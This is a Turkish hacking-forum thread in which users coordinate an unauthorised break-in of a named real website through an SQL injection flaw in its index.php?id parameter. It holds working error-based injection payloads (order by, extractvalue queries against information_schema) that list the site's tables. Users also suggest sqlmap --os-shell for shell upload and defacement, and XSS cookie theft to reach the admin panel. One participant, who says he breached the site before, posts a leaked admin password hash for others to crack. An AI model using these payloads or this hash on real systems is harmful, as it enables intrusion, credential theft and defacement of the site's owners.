SQL açıklı sitede takıldım ne yapmam lazım

LydexCoding · 25 May 2024

Az önce bir adet SQL Açıklı site ile karşılaştım ancak nasıl sızacağımı vs. anlamadım yada yapamadım, siteye nasıl sızabilirim ne yapmam lazım

Samariter Münsingen - index.php?id=2

Ekran Görüntüsü;

@SiberAslan aklıma getirdi, öylesine bi bakınayım derken buldum. Teşekkürler <3

CommandBEY · 25 May 2024

Bu zafiyei sömürüp bana veritabanındaki tabloları DMden yazana bir hediyem olacak.

RW · 25 May 2024

takıldığın yer neresidir ?

Samariter Münsingen - index.php?id=2' order by 9-- - / kolon sayısını buldum 9 çıkıyor

xpath ile denedim hack bar üzerinden ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-

tablo isimleri bu şekil çıkıyor limit 0,1 kısmını limit 1,1 / 1,2 diye artırarak diğer tablolara da bakabilirsin ;

örnek olarak ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))--+-

//

bu tabloda login diye bir isim buldum ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 13,1)))--+-

bu şekilde ilerler bu iş istersen hackbar kur kendin ilerle en azından senin bilgin için öğrenmen için iyi olucaktır

+ olarak eror based ile de bakabilirsin forumda yeterince kaynak var

LydexCoding · 25 May 2024

RW' Alıntı:
takıldığın yer neresidir ?

Samariter Münsingen - index.php?id=2' order by 9-- - / kolon sayısını buldum 9 çıkıyor

xpath ile denedim hack bar üzerinden ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)))--+-

tablo isimleri bu şekil çıkıyor limit 0,1 kısmını limit 1,1 / 1,2 diye artırarak diğer tablolara da bakabilirsin ;

örnek olarak ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 2,1)))--+-

//

bu tabloda login diye bir isim buldum ;

Samariter Münsingen - index.php?id=2' and extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() limit 13,1)))--+-

bu şekilde ilerler bu iş istersen hackbar kur kendin ilerle en azından senin bilgin için öğrenmen için iyi olucaktır

+ olarak eror based ile de bakabilirsin forumda yeterince kaynak var

Hocam ben index basmak istiyordum. Şu konudaki gibi;
SQLi OTO Shell Upload

theostekno · 25 May 2024

Dostum samariter_1 diye bir veritabanı çıkıyor ama onunda içi boş Shell upload etme konusuna gelirsek --os-shell yapıp otomatik olarak aratabilirsin Denedim ondada hata verdi yani çürük site birşey çıkmaz bundan iyi forumlar

existanyalist · 25 May 2024

LydexCoding' Alıntı:
Az önce bir adet SQL Açıklı site ile karşılaştım ancak nasıl sızacağımı vs. anlamadım yada yapamadım, siteye nasıl sızabilirim ne yapmam lazım

Samariter Münsingen - index.php?id=2

Ekran Görüntüsü;

@SiberAslan aklıma getirdi, öylesine bi bakınayım derken buldum. Teşekkürler <3

Siteye daha önceden sızmış biriyim, databesinde admin girişleri md5 ile korunuyor. Ben kıramamıştım tabii ki isterseniz deniyebilirsiniz.

LydexCoding · 25 May 2024

existanyalist' Alıntı:
Siteye daha önceden sızmış biriyim, databesinde admin girişleri md5 ile korunuyor. Ben kıramamıştım tabii ki isterseniz deniyebilirsiniz.

Eğerki kaydedilmiş bir hali varsa atabilir misiniz? Kırabilirsem bende size atayım.

existanyalist · 25 May 2024

hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

LydexCoding' Alıntı:
Eğerki kaydedilmiş bir hali varsa atabilir misiniz? Kırabilirsem bende size atayım.

hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

theostekno' Alıntı:
Dostum samariter_1 diye bir veritabanı çıkıyor ama onunda içi boş Shell upload etme konusuna gelirsek --os-shell yapıp otomatik olarak aratabilirsin Denedim ondada hata verdi yani çürük site birşey çıkmaz bundan iyi forumlar

--os-shell de işe yaramıyor o siteye hocam ya da ben yapamadım.

LydexCoding · 25 May 2024

theostekno' Alıntı:
Dostum samariter_1 diye bir veritabanı çıkıyor ama onunda içi boş Shell upload etme konusuna gelirsek --os-shell yapıp otomatik olarak aratabilirsin Denedim ondada hata verdi yani çürük site birşey çıkmaz bundan iyi forumlar

Teşekkürler, iyi forumlar.

theostekno · 26 May 2024

existanyalist' Alıntı:
hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

hash: 8686080ffff1804994797c34612eb7b0 bu hocam ben denedim kıramadım deneyebilirsiniz.

--os-shell de işe yaramıyor o siteye hocam ya da ben yapamadım.

Dostum belirttim zaten --os-shell hata veriyor diye zaten çoğu sitede --os-shell hata verir veya sqlmapdeki diğer shell methodları manuel olarak admin paneline erişmek önemli olan bu önemli bir siteyse veya hedef siteyse xss açığı arayıp cookie yoluyla admin panele erisebilirsin herşey sql açığı değildir

existanyalist · 26 May 2024

theostekno' Alıntı:
Dostum belirttim zaten --os-shell hata veriyor diye zaten çoğu sitede --os-shell hata verir veya sqlmapdeki diğer shell methodları manuel olarak admin paneline erişmek önemli olan bu önemli bir siteyse veya hedef siteyse xss açığı arayıp cookie yoluyla admin panele erisebilirsin herşey sql açığı değildir

Haklısınız hocam.

SQL açıklı sitede takıldım ne yapmam lazım

LydexCoding

Moderasyon Ekibi Çaylak

CommandBEY

Kaptan Pilot

RW

Haftanın Moderatörü

LydexCoding

Moderasyon Ekibi Çaylak

theostekno

Yeni üye

existanyalist

Junior Hunter

LydexCoding

Moderasyon Ekibi Çaylak

existanyalist

Junior Hunter

LydexCoding

Moderasyon Ekibi Çaylak

theostekno

Yeni üye

existanyalist

Junior Hunter

Sosyal medya sayfalarımız